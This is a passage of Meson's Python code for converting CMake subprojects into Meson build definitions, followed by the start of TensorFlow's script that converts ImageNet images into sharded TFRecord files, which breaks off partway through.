        self.generated = [x for x in self.generated if x is not None]

        # Make sure '.' is always in the include directories
        if '.' not in self.includes:
            self.includes += ['.']

        # make install dir relative to the install prefix
        if self.install_dir and os.path.isabs(self.install_dir):
            if os.path.commonpath([self.install_dir, install_prefix]) == install_prefix:
                self.install_dir = os.path.relpath(self.install_dir, install_prefix)

        # Remove blacklisted options and libs
        def check_flag(flag: str) -> bool:
            if flag.lower() in blacklist_link_flags or flag in blacklist_compiler_flags + blacklist_clang_cl_link_flags:
                return False
            if flag.startswith('/D'):
                return False
            return True

        self.link_libraries = [x for x in self.link_libraries if x.lower() not in blacklist_link_libs]
        self.link_flags = [x for x in self.link_flags if check_flag(x)]

    def process_object_libs(self, obj_target_list: List['ConverterTarget']):
        '''Detect which targets in ``obj_target_list`` supply our object files.

        Matches the basenames of our generated .o/.obj inputs against the
        source file names of the candidate object libraries, then drops
        those object files from ``generated``.
        '''
        # Try to detect the object library(s) from the generated input sources
        temp = [x for x in self.generated if isinstance(x, str)]
        temp = [os.path.basename(x) for x in temp]
        temp = [x for x in temp if any([x.endswith('.' + y) for y in obj_suffixes])]
        temp = [os.path.splitext(x)[0] for x in temp]
        # Temp now stores the source filenames of the object files
        for i in obj_target_list:
            source_files = [os.path.basename(x) for x in i.sources + i.generated]
            for j in source_files:
                if j in temp:
                    self.object_libs += [i]
                    break

        # Filter out object files from the sources
        self.generated = [x for x in self.generated if not isinstance(x, str) or not any([x.endswith('.' + y) for y in obj_suffixes])]

    def meson_func(self) -> str:
        '''Name of the meson function that builds this target type.'''
        return target_type_map.get(self.type.upper())

    def log(self) -> None:
        '''Dump the converted target state to the meson log (debugging aid).'''
        mlog.log('Target', mlog.bold(self.name))
        mlog.log('  -- artifacts:      ', mlog.bold(str(self.artifacts)))
        mlog.log('  -- full_name:      ', mlog.bold(self.full_name))
        mlog.log('  -- type:           ', mlog.bold(self.type))
        mlog.log('  -- install:        ', mlog.bold('true' if self.install else 'false'))
        mlog.log('  -- install_dir:    ', mlog.bold(self.install_dir))
        mlog.log('  -- link_libraries: ', mlog.bold(str(self.link_libraries)))
        mlog.log('  -- link_with:      ', mlog.bold(str(self.link_with)))
        mlog.log('  -- object_libs:    ', mlog.bold(str(self.object_libs)))
        mlog.log('  -- link_flags:     ', mlog.bold(str(self.link_flags)))
        mlog.log('  -- languages:      ', mlog.bold(str(self.languages)))
        mlog.log('  -- includes:       ', mlog.bold(str(self.includes)))
        mlog.log('  -- sources:        ', mlog.bold(str(self.sources)))
        mlog.log('  -- generated:      ', mlog.bold(str(self.generated)))
        mlog.log('  -- pie:            ', mlog.bold('true' if self.pie else 'false'))
        mlog.log('  -- override_opts:  ', mlog.bold(str(self.override_options)))
        mlog.log('  -- options:')
        for key, val in self.compile_opts.items():
            mlog.log('    -', key, '=', mlog.bold(str(val)))
class CustomTargetReference:
    '''Reference to a single output (by index) of a ConverterCustomTarget.'''
    def __init__(self, ctgt: 'ConverterCustomTarget', index: int):
        self.ctgt = ctgt    # type: ConverterCustomTarget
        self.index = index  # type: int

    def __repr__(self) -> str:
        cls_name = self.__class__.__name__
        if not self.valid():
            return '<{}: INVALID REFERENCE>'.format(cls_name)
        return '<{}: {} [{}]>'.format(cls_name, self.ctgt.name, self.ctgt.outputs[self.index])

    def valid(self) -> bool:
        '''True when the reference points at a real target output.'''
        return self.ctgt is not None and self.index >= 0

    def filename(self) -> str:
        '''Basename of the referenced output file.'''
        return self.ctgt.outputs[self.index]
class ConverterCustomTarget:
    '''Converts a traced CMake add_custom_command/target into meson form.

    Instances get a synthetic unique name (custom_tgt_N) via a class
    counter; postprocess() resolves working dir, output paths, command
    references and dependencies against the shared output_target_map.
    '''
    tgt_counter = 0  # type: int

    def __init__(self, target: CMakeGeneratorTarget):
        self.name = 'custom_tgt_{}'.format(ConverterCustomTarget.tgt_counter)
        self.original_outputs = list(target.outputs)
        self.outputs = [os.path.basename(x) for x in self.original_outputs]
        self.command = target.command
        self.working_dir = target.working_dir
        self.depends_raw = target.depends
        self.inputs = []
        self.depends = []

        ConverterCustomTarget.tgt_counter += 1

    def __repr__(self) -> str:
        return '<{}: {}>'.format(self.__class__.__name__, self.outputs)

    def postprocess(self, output_target_map: dict, root_src_dir: str, subdir: str, build_dir: str) -> None:
        '''Resolve paths, command target references and raw dependencies.'''
        # Default the working directory to the CMake build dir. This
        # is not 100% correct, since it should be the value of
        # ${CMAKE_CURRENT_BINARY_DIR} when add_custom_command is
        # called. However, keeping track of this variable is not
        # trivial and the current solution should work in most cases.
        if not self.working_dir:
            self.working_dir = build_dir

        # relative paths in the working directory are always relative
        # to ${CMAKE_CURRENT_BINARY_DIR} (see note above)
        if not os.path.isabs(self.working_dir):
            self.working_dir = os.path.normpath(os.path.join(build_dir, self.working_dir))

        # Modify the original outputs if they are relative. Again,
        # relative paths are relative to ${CMAKE_CURRENT_BINARY_DIR}
        # and the first disclaimer is stil in effect
        def ensure_absolute(x: str):
            if os.path.isabs(x):
                return x
            else:
                return os.path.normpath(os.path.join(build_dir, x))
        self.original_outputs = [ensure_absolute(x) for x in self.original_outputs]

        # Check if the command is a build target
        commands = []
        for i in self.command:
            assert(isinstance(i, list))
            cmd = []

            for j in i:
                target_key = _target_key(j)
                if target_key in output_target_map:
                    # Command word names a known target: substitute the
                    # converted target object so meson can depend on it.
                    cmd += [output_target_map[target_key]]
                else:
                    cmd += [j]

            commands += [cmd]
        self.command = commands

        # Check dependencies and input files
        # Each raw dependency is classified, in order, as: an output file
        # of a known target, a known target by name, an output of another
        # custom target (becomes an input ref), or a plain source file
        # (relative or absolute within the source tree).
        for i in self.depends_raw:
            tgt_key = _target_key(i)
            gen_key = _generated_file_key(i)

            if os.path.basename(i) in output_target_map:
                self.depends += [output_target_map[os.path.basename(i)]]
            elif tgt_key in output_target_map:
                self.depends += [output_target_map[tgt_key]]
            elif gen_key in output_target_map:
                self.inputs += [output_target_map[gen_key].get_ref(i)]
            elif not os.path.isabs(i) and os.path.exists(os.path.join(root_src_dir, i)):
                self.inputs += [i]
            elif os.path.isabs(i) and os.path.exists(i) and os.path.commonpath([i, root_src_dir]) == root_src_dir:
                self.inputs += [os.path.relpath(i, root_src_dir)]

    def get_ref(self, fname: str) -> Optional[CustomTargetReference]:
        '''Return a reference to the output matching ``fname``, else None.'''
        try:
            idx = self.outputs.index(os.path.basename(fname))
            return CustomTargetReference(self, idx)
        except ValueError:
            return None

    def log(self) -> None:
        '''Dump the converted custom-target state to the meson log.'''
        mlog.log('Custom Target', mlog.bold(self.name))
        mlog.log('  -- command:      ', mlog.bold(str(self.command)))
        mlog.log('  -- outputs:      ', mlog.bold(str(self.outputs)))
        mlog.log('  -- working_dir:  ', mlog.bold(str(self.working_dir)))
        mlog.log('  -- depends_raw:  ', mlog.bold(str(self.depends_raw)))
        mlog.log('  -- inputs:       ', mlog.bold(str(self.inputs)))
        mlog.log('  -- depends:      ', mlog.bold(str(self.depends)))
class CMakeInterpreter:
    """Drives a CMake subproject for meson.

    Workflow: configure() runs CMake with tracing enabled, initialise()
    additionally queries the CMake server for the code model, analyse()
    converts the raw results into Converter* objects, and
    pretend_to_be_meson() emits an equivalent meson AST.
    """

    def __init__(self, build: 'Build', subdir: str, src_dir: str, install_prefix: str, env: Environment, backend: 'Backend'):
        assert(hasattr(backend, 'name'))
        self.build = build
        self.subdir = subdir
        self.src_dir = src_dir
        self.build_dir_rel = os.path.join(subdir, '__CMake_build')
        self.build_dir = os.path.join(env.get_build_dir(), self.build_dir_rel)
        self.install_prefix = install_prefix
        self.env = env
        self.backend_name = backend.name
        self.client = CMakeClient(self.env)

        # Raw CMake results
        self.bs_files = []
        self.codemodel = None
        self.raw_trace = None

        # Analysed data
        self.project_name = ''
        self.languages = []
        self.targets = []
        self.custom_targets = []  # type: List[ConverterCustomTarget]
        self.trace = CMakeTraceParser()

        # Generated meson data
        self.generated_targets = {}

    def configure(self, extra_cmake_options: List[str]) -> None:
        """Run CMake to configure the subproject build directory.

        Stdout is streamed to the meson log from a helper thread while
        stderr (the --trace output) is captured into self.raw_trace.
        Raises CMakeException when CMake is missing or configuration fails.
        """
        for_machine = MachineChoice.HOST  # TODO make parameter
        # Find CMake
        cmake_exe = CMakeExecutor(self.env, '>=3.7', for_machine)
        if not cmake_exe.found():
            raise CMakeException('Unable to find CMake')

        generator = backend_generator_map[self.backend_name]
        cmake_args = cmake_exe.get_command()

        # Map meson compiler to CMake variables
        for lang, comp in self.env.coredata.compilers[for_machine].items():
            if lang not in language_map:
                continue
            cmake_lang = language_map[lang]
            exelist = comp.get_exelist()
            if len(exelist) == 1:
                cmake_args += ['-DCMAKE_{}_COMPILER={}'.format(cmake_lang, exelist[0])]
            elif len(exelist) == 2:
                # Two entries means a launcher (e.g. ccache) plus the compiler.
                cmake_args += ['-DCMAKE_{}_COMPILER_LAUNCHER={}'.format(cmake_lang, exelist[0]),
                               '-DCMAKE_{}_COMPILER={}'.format(cmake_lang, exelist[1])]
            if hasattr(comp, 'get_linker_exelist') and comp.get_id() == 'clang-cl':
                cmake_args += ['-DCMAKE_LINKER={}'.format(comp.get_linker_exelist()[0])]
        cmake_args += ['-G', generator]
        cmake_args += ['-DCMAKE_INSTALL_PREFIX={}'.format(self.install_prefix)]
        # --trace-expand is what analyse() later parses for custom targets.
        cmake_args += ['--trace', '--trace-expand']
        cmake_args += extra_cmake_options

        # Run CMake
        mlog.log()
        with mlog.nested():
            mlog.log('Configuring the build directory with', mlog.bold('CMake'), 'version', mlog.cyan(cmake_exe.version()))
            mlog.log(mlog.bold('Running:'), ' '.join(cmake_args))
            mlog.log()
            os.makedirs(self.build_dir, exist_ok=True)
            os_env = os.environ.copy()
            # Force the C locale so CMake's output is parseable.
            os_env['LC_ALL'] = 'C'
            proc = Popen(cmake_args + [self.src_dir], stdout=PIPE, stderr=PIPE, cwd=self.build_dir, env=os_env)

            def print_stdout():
                # Forward CMake's stdout line by line to the meson log.
                while True:
                    line = proc.stdout.readline()
                    if not line:
                        break
                    mlog.log(line.decode('utf-8').strip('\n'))
                proc.stdout.close()

            t = Thread(target=print_stdout)
            t.start()

            # stderr carries the trace output; read it fully before wait().
            self.raw_trace = proc.stderr.read()
            self.raw_trace = self.raw_trace.decode('utf-8')
            proc.stderr.close()
            proc.wait()

            t.join()
            mlog.log()

        h = mlog.green('SUCCEEDED') if proc.returncode == 0 else mlog.red('FAILED')
        mlog.log('CMake configuration:', h)
        if proc.returncode != 0:
            raise CMakeException('Failed to configure the CMake subproject')

    def initialise(self, extra_cmake_options: List[str]) -> None:
        """Configure the project, then fetch the build-system file list and
        the code model through the CMake server protocol."""
        # Run configure the old way because doing it
        # with the server doesn't work for some reason
        self.configure(extra_cmake_options)

        with self.client.connect():
            generator = backend_generator_map[self.backend_name]
            self.client.do_handshake(self.src_dir, self.build_dir, generator, 1)

            # Do a second configure to initialise the server
            self.client.query_checked(RequestConfigure(), 'CMake server configure')

            # Generate the build system files
            self.client.query_checked(RequestCompute(), 'Generating build system files')

            # Get CMake build system files
            bs_reply = self.client.query_checked(RequestCMakeInputs(), 'Querying build system files')

            # Now get the CMake code model
            cm_reply = self.client.query_checked(RequestCodeModel(), 'Querying the CMake code model')

        src_dir = bs_reply.src_dir
        self.bs_files = [x.file for x in bs_reply.build_files if not x.is_cmake and not x.is_temp]
        self.bs_files = [os.path.relpath(os.path.join(src_dir, x), self.env.get_source_dir()) for x in self.bs_files]
        # Deduplicate; ordering of bs_files is not significant.
        self.bs_files = list(set(self.bs_files))
        self.codemodel = cm_reply

    def analyse(self) -> None:
        """Convert the raw code model and trace into Converter* objects.

        Must be called after initialise(); raises CMakeException otherwise.
        """
        if self.codemodel is None:
            raise CMakeException('CMakeInterpreter was not initialized')

        # Clear analyser data
        self.project_name = ''
        self.languages = []
        self.targets = []
        self.custom_targets = []
        # Permissive: a successful configure may still contain trace lines
        # the parser does not understand.
        self.trace = CMakeTraceParser(permissive=True)

        # Parse the trace
        self.trace.parse(self.raw_trace)

        # Find all targets
        for i in self.codemodel.configs:
            for j in i.projects:
                if not self.project_name:
                    self.project_name = j.name
                for k in j.targets:
                    if k.type not in skip_targets:
                        self.targets += [ConverterTarget(k, self.env)]

        for i in self.trace.custom_targets:
            self.custom_targets += [ConverterCustomTarget(i)]

        # generate the output_target_map
        output_target_map = {}
        for i in self.targets:
            output_target_map[i.full_name] = i
            output_target_map[_target_key(i.name)] = i
            # Shared libraries may also be referenced by their SOVERSION name.
            ttarget = self.trace.targets.get(i.name)
            soversion = ttarget.properties.get('SOVERSION') if ttarget else None
            if soversion:
                k = '{}.{}'.format(i.full_name, soversion[0])
                output_target_map[k] = i
            for j in i.artifacts:
                output_target_map[os.path.basename(j)] = i
        for i in self.custom_targets:
            for j in i.original_outputs:
                output_target_map[_generated_file_key(j)] = i
        object_libs = []

        # First pass: Basic target cleanup
        for i in self.custom_targets:
            i.postprocess(output_target_map, self.src_dir, self.subdir, self.build_dir)
        for i in self.targets:
            i.postprocess(output_target_map, self.src_dir, self.subdir, self.install_prefix, self.trace)
            if i.type == 'OBJECT_LIBRARY':
                object_libs += [i]
            self.languages += [x for x in i.languages if x not in self.languages]

        # Second pass: Detect object library dependencies
        for i in self.targets:
            i.process_object_libs(object_libs)

        mlog.log('CMake project', mlog.bold(self.project_name), 'has', mlog.bold(str(len(self.targets) + len(self.custom_targets))), 'build targets.')

    def pretend_to_be_meson(self) -> CodeBlockNode:
        """Emit a meson AST equivalent to the analysed CMake project.

        Must be called after analyse(); raises CMakeException otherwise.
        Populates self.generated_targets with the variable names chosen
        for each converted target.
        """
        if not self.project_name:
            raise CMakeException('CMakeInterpreter was not analysed')

        # --- small helpers for constructing AST nodes with dummy positions ---

        def token(tid: str = 'string', val='') -> Token:
            return Token(tid, self.subdir, 0, 0, 0, None, val)

        def string(value: str) -> StringNode:
            return StringNode(token(val=value))

        def id_node(value: str) -> IdNode:
            return IdNode(token(val=value))

        def number(value: int) -> NumberNode:
            return NumberNode(token(val=value))

        def nodeify(value):
            # Convert a plain Python value into the matching AST node;
            # AST nodes pass through unchanged.
            if isinstance(value, str):
                return string(value)
            elif isinstance(value, bool):
                return BooleanNode(token(), value)
            elif isinstance(value, int):
                return number(value)
            elif isinstance(value, list):
                return array(value)
            return value

        def indexed(node: BaseNode, index: int) -> IndexNode:
            return IndexNode(node, nodeify(index))

        def array(elements) -> ArrayNode:
            args = ArgumentNode(token())
            if not isinstance(elements, list):
                elements = [args]
            args.arguments += [nodeify(x) for x in elements]
            return ArrayNode(args, 0, 0, 0, 0)

        def function(name: str, args=None, kwargs=None) -> FunctionNode:
            if args is None:
                args = []
            if kwargs is None:
                kwargs = {}
            args_n = ArgumentNode(token())
            if not isinstance(args, list):
                args = [args]
            args_n.arguments = [nodeify(x) for x in args]
            args_n.kwargs = {k: nodeify(v) for k, v in kwargs.items()}
            func_n = FunctionNode(self.subdir, 0, 0, 0, 0, name, args_n)
            return func_n

        def method(obj: BaseNode, name: str, args=None, kwargs=None) -> MethodNode:
            if args is None:
                args = []
            if kwargs is None:
                kwargs = {}
            args_n = ArgumentNode(token())
            if not isinstance(args, list):
                args = [args]
            args_n.arguments = [nodeify(x) for x in args]
            args_n.kwargs = {k: nodeify(v) for k, v in kwargs.items()}
            return MethodNode(self.subdir, 0, 0, obj, name, args_n)

        def assign(var_name: str, value: BaseNode) -> AssignmentNode:
            return AssignmentNode(self.subdir, 0, 0, var_name, value)

        # Generate the root code block and the project function call
        root_cb = CodeBlockNode(token())
        root_cb.lines += [function('project', [self.project_name] + self.languages)]

        # Add the run script for custom commands
        run_script = '{}/data/run_ctgt.py'.format(os.path.dirname(os.path.realpath(__file__)))
        run_script_var = 'ctgt_run_script'
        root_cb.lines += [assign(run_script_var, function('find_program', [[run_script]], {'required': True}))]

        # Add the targets
        # Maps target name -> dict of the meson variable names generated for it.
        processed = {}

        def resolve_ctgt_ref(ref: CustomTargetReference) -> BaseNode:
            tgt_var = processed[ref.ctgt.name]['tgt']
            if len(ref.ctgt.outputs) == 1:
                return id_node(tgt_var)
            else:
                # Multi-output custom targets are referenced by index.
                return indexed(id_node(tgt_var), ref.index)

        def process_target(tgt: ConverterTarget):
            # First handle inter target dependencies
            link_with = []
            objec_libs = []
            sources = []
            generated = []
            generated_filenames = []
            custom_targets = []
            for i in tgt.link_with:
                assert(isinstance(i, ConverterTarget))
                if i.name not in processed:
                    process_target(i)
                link_with += [id_node(processed[i.name]['tgt'])]
            for i in tgt.object_libs:
                assert(isinstance(i, ConverterTarget))
                if i.name not in processed:
                    process_target(i)
                objec_libs += [processed[i.name]['tgt']]

            # Generate the source list and handle generated sources
            for i in tgt.sources + tgt.generated:
                if isinstance(i, CustomTargetReference):
                    if i.ctgt.name not in processed:
                        process_custom_target(i.ctgt)
                    generated += [resolve_ctgt_ref(i)]
                    generated_filenames += [i.filename()]
                    if i.ctgt not in custom_targets:
                        custom_targets += [i.ctgt]
                else:
                    sources += [i]

            # Add all header files from all used custom targets. This
            # ensures that all custom targets are built before any
            # sources of the current target are compiled and thus all
            # header files are present. This step is necessary because
            # CMake always ensures that a custom target is executed
            # before another target if at least one output is used.
            for i in custom_targets:
                for j in i.outputs:
                    if not is_header(j) or j in generated_filenames:
                        continue
                    generated += [resolve_ctgt_ref(i.get_ref(j))]
                    generated_filenames += [j]

            # Determine the meson function to use for the build target
            tgt_func = tgt.meson_func()
            if not tgt_func:
                raise CMakeException('Unknown target type "{}"'.format(tgt.type))

            # Determine the variable names
            base_name = str(tgt.name)
            base_name = base_name.replace('-', '_')
            inc_var = '{}_inc'.format(base_name)
            src_var = '{}_src'.format(base_name)
            dep_var = '{}_dep'.format(base_name)
            tgt_var = base_name

            # Generate target kwargs
            tgt_kwargs = {
                'link_args': tgt.link_flags + tgt.link_libraries,
                'link_with': link_with,
                'include_directories': id_node(inc_var),
                'install': tgt.install,
                'install_dir': tgt.install_dir,
                'override_options': tgt.override_options,
                'objects': [method(id_node(x), 'extract_all_objects') for x in objec_libs],
            }

            # Handle compiler args
            for key, val in tgt.compile_opts.items():
                tgt_kwargs['{}_args'.format(key)] = val

            # Handle -fPCI, etc
            if tgt_func == 'executable':
                tgt_kwargs['pie'] = tgt.pie
            elif tgt_func == 'static_library':
                tgt_kwargs['pic'] = tgt.pie

            # declare_dependency kwargs
            dep_kwargs = {
                'link_args': tgt.link_flags + tgt.link_libraries,
                'link_with': id_node(tgt_var),
                'compile_args': tgt.public_compile_opts,
                'include_directories': id_node(inc_var),
            }

            # Generate the function nodes
            inc_node = assign(inc_var, function('include_directories', tgt.includes))
            node_list = [inc_node]
            if tgt_func == 'header_only':
                # Header-only targets produce no build artifact, only a dep.
                del dep_kwargs['link_with']
                dep_node = assign(dep_var, function('declare_dependency', kwargs=dep_kwargs))
                node_list += [dep_node]
                src_var = ''
                tgt_var = ''
            else:
                src_node = assign(src_var, function('files', sources))
                tgt_node = assign(tgt_var, function(tgt_func, [base_name, [id_node(src_var)] + generated], tgt_kwargs))
                node_list += [src_node, tgt_node]
                if tgt_func in ['static_library', 'shared_library']:
                    dep_node = assign(dep_var, function('declare_dependency', kwargs=dep_kwargs))
                    node_list += [dep_node]
                else:
                    dep_var = ''

            # Add the nodes to the ast
            root_cb.lines += node_list
            processed[tgt.name] = {'inc': inc_var, 'src': src_var, 'dep': dep_var, 'tgt': tgt_var, 'func': tgt_func}

        def process_custom_target(tgt: ConverterCustomTarget) -> None:
            # CMake allows to specify multiple commands in a custom target.
            # To map this to meson, a helper script is used to execute all
            # commands in order. This additionally allows setting the working
            # directory.
            tgt_var = tgt.name  # type: str

            def resolve_source(x: Any) -> Any:
                # Map dependencies to AST references, processing them first
                # if they have not been emitted yet.
                if isinstance(x, ConverterTarget):
                    if x.name not in processed:
                        process_target(x)
                    return id_node(x.name)
                elif isinstance(x, CustomTargetReference):
                    if x.ctgt.name not in processed:
                        process_custom_target(x.ctgt)
                    return resolve_ctgt_ref(x)
                else:
                    return x

            # Generate the command list
            command = []
            command += [id_node(run_script_var)]
            command += ['-o', '@OUTPUT@']
            command += ['-O'] + tgt.original_outputs
            command += ['-d', tgt.working_dir]

            # Generate the commands. Subcommands are separated by ';;;'
            for cmd in tgt.command:
                command += [resolve_source(x) for x in cmd] + [';;;']

            tgt_kwargs = {
                'input': [resolve_source(x) for x in tgt.inputs],
                'output': tgt.outputs,
                'command': command,
                'depends': [resolve_source(x) for x in tgt.depends],
            }

            root_cb.lines += [assign(tgt_var, function('custom_target', [tgt.name], tgt_kwargs))]
            processed[tgt.name] = {'inc': None, 'src': None, 'dep': None, 'tgt': tgt_var, 'func': 'custom_target'}

        # Now generate the target function calls
        for i in self.custom_targets:
            if i.name not in processed:
                process_custom_target(i)
        for i in self.targets:
            if i.name not in processed:
                process_target(i)

        self.generated_targets = processed
        return root_cb

    def target_info(self, target: str) -> Optional[Dict[str, str]]:
        """Return the generated meson variable names for *target*, or None."""
        if target in self.generated_targets:
            return self.generated_targets[target]
        return None

    def target_list(self) -> List[str]:
        """Return the names of all converted targets."""
        return list(self.generated_targets.keys())
|
build_imagenet_data.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFRecord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
# Command-line flags controlling input/output locations and sharding.
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
                           'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
                           'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
                           'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
                            'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
                            'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
                            'Number of threads to preprocess the images.')

# The labels file contains the list of valid labels.
# Assumes that the file contains entries as such:
#   n01440764
#   n01443537
#   n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
                           'imagenet_lsvrc_2015_synsets.txt',
                           'Labels file')

# This file contains the mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
#   n02119247    black fox
#   n02119359    silver fox
#   n02119477    red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
                           'imagenet_metadata.txt',
                           'ImageNet metadata file')

# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
#   n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
#   <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist multiple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
                           './imagenet_2012_bounding_boxes.csv',
                           'Bounding box file')

# Parsed flag values, accessed throughout the module.
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
    """Wrap *value* (an int or a list of ints) in an int64 Example feature."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def _float_feature(value):
    """Wrap *value* (a float or a list of floats) in a float Example feature."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(float_list=tf.train.FloatList(value=values))
def _bytes_feature(value):
    """Wrap a single bytes *value* in a bytes Example feature."""
    bytes_list = tf.train.BytesList(value=[value])
    return tf.train.Feature(bytes_list=bytes_list)
def _convert_to_example(filename, image_buffer, label, synset, human, bbox, height, width):
    """Build an Example proto for an example.

    Args:
      filename: string, path to an image file, e.g., '/path/to/example.JPG'
      image_buffer: string, JPEG encoding of RGB image
      label: integer, identifier for the ground truth for the network
      synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
      human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
      bbox: list of bounding boxes; each box is a list of integers
        specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
        the same label as the image label.
      height: integer, image height in pixels
      width: integer, image width in pixels
    Returns:
      Example proto
    """
    xmin = []
    ymin = []
    xmax = []
    ymax = []
    for b in bbox:
        assert len(b) == 4
        # b is ordered [xmin, ymin, xmax, ymax]; distribute each coordinate
        # into its per-axis list. (A plain loop replaces the previous
        # side-effecting list comprehension that pylint had to suppress.)
        for coords, point in zip([xmin, ymin, xmax, ymax], b):
            coords.append(point)
    colorspace = b'RGB'
    channels = 3
    image_format = b'JPEG'

    example = tf.train.Example(features=tf.train.Features(feature={
        'image/height': _int64_feature(height),
        'image/width': _int64_feature(width),
        'image/colorspace': _bytes_feature(colorspace),
        'image/channels': _int64_feature(channels),
        'image/class/label': _int64_feature(label),
        'image/class/synset': _bytes_feature(synset.encode()),
        'image/class/text': _bytes_feature(human.encode()),
        'image/object/bbox/xmin': _float_feature(xmin),
        'image/object/bbox/xmax': _float_feature(xmax),
        'image/object/bbox/ymin': _float_feature(ymin),
        'image/object/bbox/ymax': _float_feature(ymax),
        # Per-box labels; by construction identical to the image label.
        'image/object/bbox/label': _int64_feature([label] * len(xmin)),
        'image/format': _bytes_feature(image_format),
        'image/filename': _bytes_feature(os.path.basename(filename).encode()),
        'image/encoded': _bytes_feature(image_buffer)}))
    return example
class ImageCoder(object):
    """Helper class that provides TensorFlow image coding utilities.

    Builds a small graph once (PNG->JPEG, CMYK JPEG->RGB JPEG, JPEG decode)
    and runs it in a single shared Session for all images.
    """

    def __init__(self):
        # Create a single Session to run all image coding calls.
        self._sess = tf.Session()

        # Initializes function that converts PNG to JPEG data.
        self._png_data = tf.placeholder(dtype=tf.string)
        image = tf.image.decode_png(self._png_data, channels=3)
        self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)

        # Initializes function that converts CMYK JPEG data to RGB JPEG data.
        self._cmyk_data = tf.placeholder(dtype=tf.string)
        # channels=0 lets the decoder use the channel count stored in the file.
        image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
        self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)

        # Initializes function that decodes RGB JPEG data.
        self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
        self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)

    def png_to_jpeg(self, image_data):
        """Re-encode PNG bytes as RGB JPEG bytes."""
        return self._sess.run(self._png_to_jpeg, feed_dict={self._png_data: image_data})

    def cmyk_to_rgb(self, image_data):
        """Re-encode a CMYK JPEG as an RGB JPEG."""
        return self._sess.run(self._cmyk_to_rgb, feed_dict={self._cmyk_data: image_data})

    def decode_jpeg(self, image_data):
        """Decode JPEG bytes into a height x width x 3 image array."""
        image = self._sess.run(self._decode_jpeg, feed_dict={self._decode_jpeg_data: image_data})
        assert len(image.shape) == 3
        assert image.shape[2] == 3
        return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
